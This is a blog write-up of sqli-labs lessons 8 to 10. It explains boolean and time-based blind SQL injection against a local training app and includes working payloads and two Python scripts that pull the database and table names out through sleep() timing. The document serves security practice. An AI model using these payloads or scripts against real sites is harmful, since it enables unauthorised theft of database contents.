sqlilabs Less8~Less10 writeup

Contents
  1. Less-8
  2. Less-9
  3. Less-10

On with the injection!

Less-8


Less-8 is solved exactly like Less-5: close the string with a single quote, and it is still boolean-based blind injection. See the earlier post:

https://willardtm.github.io/2018/02/19/sqlilabs-Less-5~6/

Less-9


The title of Less-9 already tells you it is time-based blind injection. I wrote a time-based script back in Less-6, but Less-9 raises the difficulty a little: whatever you send, the page returns "You are in", and the injection closes a single quote, so the script needs a few changes.
First, test the length of the database name:

http://localhost/sqli-labs-master/Less-9/?id=1' and If(length(database())=5,1,sleep(5))%23

Inspecting the request in the browser dev tools (F12) shows it took 6.12s.

When the tested length reaches 8, the response time drops to 1.10s, which means no delay was triggered, so the database name is 8 characters long.

Compared with the Less-6 script, the only change is a timing block: record the time before the request, compare it with the time after, and treat a reply that came back faster than the sleep() value as "condition true". The threshold has to sit clearly above the normal round-trip time, otherwise a slow page is misread. Script:

```python
#!/usr/bin/env python3
# coding=utf-8

'''
Because sometimes a page returns the same content whatever the input is,
this program uses the response time to detect the right information.
'''

import requests
import time

DELAY = 5   # seconds passed to sleep(); a reply faster than this means "no sleep"

def send_data(payload):
    # The injected single quote closes the string; %23 (#) comments out the rest of the query.
    url = "http://localhost/sqli-labs-master/Less-9/?id=1' " + payload
    start_time = time.time()
    requests.get(url)
    # sleep() is in the FALSE branch of if(), so a fast answer means the guess is right.
    return time.time() - start_time < DELAY

def get_db_length():
    for i in range(1, 20):
        payload = "and if(length(database())=" + str(i) + ",1,sleep(5))%23"
        if send_data(payload):
            print("The length of database is", i)
            return i
    return None

def get_db_name():
    chars = ".1234567890_abcdefghijklmnopqrstuvwxyz@ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    result = ""
    db_length = get_db_length()
    if db_length is not None:
        # substr() positions start at 1, so walk 1..db_length (position 0 returns '' and never matches)
        for j in range(1, db_length + 1):
            for char in chars:
                payload = "and if(ascii(substr(database()," + str(j) + ",1))=" + str(ord(char)) + ",1,sleep(5))%23"
                if send_data(payload):
                    result += char
                    print(result)
                    break
    print(result)

def main():
    get_db_name()

if __name__ == "__main__":
    main()
```

I ran into this kind of challenge in several CTFs before, but back then I genuinely did not know how to do it, and it seemed like a hassle so I did not want to learn it... The script also takes quite a while to run.
OK, moving on: list the tables once more; the later steps are much the same.

```python
#!/usr/bin/env python3
# coding=utf-8

import requests
import time

DELAY = 5   # seconds passed to sleep()

def send_data(payload):
    # Same oracle as before: sleep() is in the false branch, so a fast reply means the guess is right.
    url = "http://localhost/sqli-labs-master/Less-9/?id=1' " + payload
    start_time = time.time()
    requests.get(url)
    return time.time() - start_time < DELAY

def get_table_num():
    for i in range(0, 20):
        payload = "and if((select count(*) from information_schema.tables where table_schema=database())=" + str(i) + ",1,sleep(5))%23"
        if send_data(payload):
            print("The number of tables is", i)
            return i
    return None

def get_table_length(j):
    # j is the 0-based offset used in "limit j,1"
    for i in range(1, 20):
        payload = "and if((select length(table_name) from information_schema.tables where table_schema=database() limit " + str(j) + ",1)=" + str(i) + ",1,sleep(5))%23"
        if send_data(payload):
            print("The length of table is", i)
            return i
    return None

def get_table_names():
    chars = ".1234567890@abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    table_num = get_table_num()
    if table_num is None:
        return
    # Only walk the tables that exist: past the end, "limit j,1" yields NULL, every comparison
    # falls into the sleep() branch, and each guess costs 5 seconds for nothing.
    for i in range(table_num):
        result = ""
        table_length = get_table_length(i)
        if table_length is not None:
            # substr() positions start at 1
            for j in range(1, table_length + 1):
                for char in chars:
                    payload = "and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit " + str(i) + ",1)," + str(j) + ",1))=" + str(ord(char)) + ",1,sleep(5))%23"
                    if send_data(payload):
                        result += char
                        break
        print(result)

def main():
    get_table_names()

if __name__ == "__main__":
    main()
```

Less-10


Less-10 is also time-based blind injection and is tested the same way as Less-9 (watch the request time in the dev tools); the only difference is that Less-10 closes the string with a double quote instead of a single one.
The Less-9 script can be reused as-is after changing the `'` in the URL to `"`.